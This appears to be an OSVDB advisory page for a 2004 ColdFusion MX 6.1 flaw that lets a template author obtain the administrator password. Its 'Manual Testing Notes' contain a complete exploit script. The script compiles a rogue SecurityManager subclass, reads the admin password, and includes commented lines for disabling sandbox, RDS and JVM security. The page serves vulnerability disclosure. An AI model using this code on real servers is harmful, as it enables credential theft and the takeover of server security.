10477 : ColdFusion MX Object Tag Admin Password Disclosure
Printer | http://osvdb.org/10477 | Email This | Edit Vulnerability

Views This Week

Views All Time

Info

Last Modified

5 months ago

Percent Complete

90%

Disclosure

Oct 04, 2004

Discovery

Unknown

Dates

Exploit

Unknown

Solution

Unknown

Description

Macromedia ColdFusion MX contains a flaw that may allow a malicious user to get administrator password. The issue is triggered when a remote authenticated user with template creating privileges creates a template to access the administrative password, resulting in a loss of confidentiality.

Classification

Location: Unknown Location
Attack Type: Misconfiguration
Impact: Loss of Confidentiality
Exploit: Exploit Available
Disclosure: OSVDB Verified

Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Products

Macromedia, Inc.

ColdFusion MX

6.1

References

Vendor Specific Advisory URL: http://www.macromedia.com/devnet/security/security_zone/mpsb04-10.html
Secunia Advisory ID: 12693 18078
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-09/0457.html
Security Tracker: 1011475
Vendor URL: http://www.macromedia.com/software/coldfusion/

Manual Testing Notes

objFileWriter = CreateObject("java","java.io.FileWriter");

objByteArray = CreateObject("java","java.io.ByteArrayOutputStream");

objJavaC = CreateObject("java","sun.tools.javac.Main");

objString = CreateObject("java","java.lang.String");

objFile = CreateObject("java","java.io.File");

if (Server.Os.Name IS "Windows") { s = "\"; } else { s = "/"; }

strJavaSource = "#Server.ColdFusion.Rootdir##s#lib#s#SecurityExploit.java";

strCfusionJar = "#Server.ColdFusion.Rootdir##s#lib#s#cfusion.jar";

strNeoSecFile = "#Server.ColdFusion.Rootdir##s#lib#s#neo-security.xml";

strPasswdFile = "#Server.ColdFusion.Rootdir##s#lib#s#password.properties";

fileWriter = objFileWriter.init("#strJavaSource#",false);

fileWriter.write("import coldfusion.security.SecurityManager;");

fileWriter.write("import java.io.File;");

fileWriter.write("public class SecurityExploit extends SecurityManager {");

fileWriter.write("public SecurityExploit(File arg0, File arg1) {");

fileWriter.write("super(arg0, arg1); }");

fileWriter.write("public boolean isAdminSecurityEnabled(){");

fileWriter.write("return false;}}");

fileWriter.flush();

fileWriter.close();

str = objString.init("-classpath,#strCfusionJar#,#strJavaSource#");

strArr = str.split(",");

byteArray = objByteArray.init();

compileObj =objJavaC.init(byteArray,str);

compileObj.compile(strArr);

obj = CreateObject("java","SecurityExploit");

file1 = objFile.init("#strNeoSecFile#");

file2 = objFile.init("#strPasswdFile#");

obj.init(file1,file2);

obj.load();

</cfscript>

// Get Administrator Password

strAdminPw = obj.getAdminPassword();

// Set Administrator Password

//obj.setAdminPassword("test123");

// Turn off Sandbox Security

//obj.setSandboxSecurityEnabled(false);

// Turn off Administrator Login

//obj.setAdminSecurityEnabled(false);

// Turn off RDS Login

//obj.setRdsSecurityEnabled(false);

// Set RDS Password

//obj.setRdsPassword("test123");

// Turn off JVM Security

//obj.setJvmSecurityEnabled(false);

</cfscript>

<cfoutput>Adminstrator Password: #strAdminPw#</cfoutput>

Credit

Unknown or Incomplete

Blogs

Provided by Technorati

None found at this time

Comments

Add Comment Hide Add Comment

No Comments.

DONATE NOW!

User Status

Account
- Login
- Sign-Up

Quick Searches